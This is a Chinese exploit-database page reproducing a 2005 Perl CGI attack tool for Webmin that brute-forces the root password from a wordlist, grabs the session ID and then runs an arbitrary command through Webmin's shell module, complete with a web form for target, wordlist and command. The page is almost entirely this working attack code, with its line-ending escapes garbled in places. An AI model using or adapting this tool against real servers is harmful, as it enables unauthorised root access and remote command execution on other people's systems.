Webmin 1.5 – Web Brute Force (CGI)
漏洞ID | 1054855 | 漏洞类型 | |
发布时间 | 2005-01-08 | 更新时间 | 2005-01-08 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Multiple | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/perl
use CGI qw(:standard);
use IO::Socket;
$CGI::HEADERS_ONCE = 1;
$CGI = new CGI;
$atak = $CGI->param("atak");
$host = $CGI->param("host");
$wlist = $CGI->param("wlist");
$cmd = $CGI->param("cmd");
print $CGI->header(-type=>'text/html',-charset=>'windows-1254');
print qq~<html><head><meta http-equiv=Content-Type" content=text/html;
charset=ISO-8859-9><title>Webmin Web Brute Force v1.5 - cgi
versiyon</title></head>
<body bgcolor=black text=red>Webmin Web Brute Force v1.5 - cgi versiyon<br>
<font color=blue>
Webmin BruteForce + Command execution- cgi version<br>
v1.0:By Di42lo - [email protected]<br>
v1.5:By ZzagorR - [email protected] - www.rootbinbash.com<br>
</font>~;
if($atak eq "webmin") {
open (data, "$wlist");
@wordlist=<data>;
close data;
$passx=@wordlist;
$chk=0;
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host",
PeerPort => "10000",Timeout => 25) || die "[-] Webmin on this host does not
existrn";
$sock->close;
print "[+] BruteForcing...<br>";
$sid;
$n=0;
while ($chk!=1) {
$n++;
if($n>$passx){
exit;
}
$pass=@wordlist[$passx-$n];
$pass_line="page=%2F&user=root&pass=$pass";
$buffer="POST /session_login.cgi HTTP/1.0n".
"Host: $host:10000n".
"Keep-Alive: 300n".
"Connection: keep-aliven".
"Referer: http://$host:10000/n".
"Cookie: testing=1n".
"Content-Type: application/x-www-form-urlencodedn".
"Content-Length: __n".
"n".
$pass_line."nn";
$line_size=length($pass_line);
$buffer=~s/__/$line_size/g;
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host",
PeerPort => "10000",Timeout => 25);
if ($sock){
print "[+] Denenen sifre: $pass<br>";
print $sock $buffer;
while ($answer=<$sock>){
if ($answer=~/sid=(.*);/g){
$chk=1;
$sid=$1;
print "[+] Found SID : $sid<br>";
print "[+] Sifre : $pass<br>";
}
}
}
$sock->close;
}
print "[+] Connecting to host once again<br>";
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort
=> "10000",Timeout => 10) || die "[-] Cant Connect once again for command
executionn";
print "[+] Connected.. Sending Buffer<br>";
$temp="-----------------------------19777347561180971495777867604n".
"Content-Disposition: form-data; name="cmd"n".
"n".
"$cmdn".
"-----------------------------19777347561180971495777867604n".
"Content-Disposition: form-data; name="pwd"n".
"n".
"/rootn".
"-----------------------------19777347561180971495777867604n".
"Content-Disposition: form-data; name="history"n".
"n".
"n".
"-----------------------------19777347561180971495777867604n".
"Content-Disposition: form-data; name="previous"n".
"n".
"$cmdn".
"-----------------------------19777347561180971495777867604n".
"Content-Disposition: form-data; name="pcmd"n".
"n".
"$cmdn".
"-----------------------------19777347561180971495777867604--nn";
$buffer_size=length($temp);
$buffer="POST /shell/index.cgi HTTP/1.1n".
"Host: $host:10000n".
"Keep-Alive: 300n".
"Connection: keep-aliven".
"Referer: http://$host:10000/shell/n".
"Cookie: sid=$sid; testing=1; xn".
"Content-Type: multipart/form-data;
boundary=---------------------------19777347561180971495777867604n".
"Content-Length: sizn".
"n".
$temp;
$buffer=~s/siz/$buffer_size/g;
print $sock $buffer;
if ($sock){
print "[+] Buffer sent...running command $cmd<br>";
print $sock $buffer;
while ($answer=<$sock>){
if ($answer=~/defaultStatus="(.*)";/g) { print $1."<br>";}
if ($answer=~/<td><pre><b>>/g){
$cmd_chk=1;
}
if ($cmd_chk==1) {
if ($answer=~/</pre></td></tr>/g){
exit;
} else {
print $answer;
}
}
}
}
}
if($atak eq ""){
print qq~
<table align=left cellspacing="0" cellpading="0"><form aciton=?><input
type=hidden name=atak value=webmin>
<tr><td colspan="3" align=center>Webmin Web Brute Force v1.5 - cgi
version</td></tr>
<tr><td>Server:</td><td colspan="2"><input type="text" name="host" size="50"
value="www."></td></tr>
<tr><td valign="top">Wordlist:</td><td valign="top"><input type="file"
name="wlist"></td><td valign="top"
align="left">Examples:<br>---------<br>admin<br>administrator<br>redhat<br>mandrake<br>suse<br></td></tr>
<tr><td>Cmd:</td><td colspan="2"><input type="text" name="cmd" size="50"
value="uptime"></td></tr>
<tr><td colspan="3" align="center"><input type="submit" name=""
value="Gooooooo!"></td></tr>
</form></table></body></html>~;
}
# milw0rm.com [2005-01-08]
相关推荐: Super Site Searcher Remote Command Execution Vulnerability
Super Site Searcher Remote Command Execution Vulnerability 漏洞ID 1101566 漏洞类型 Input Validation Error 发布时间 2002-09-03 更新时间 2002-09-0…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666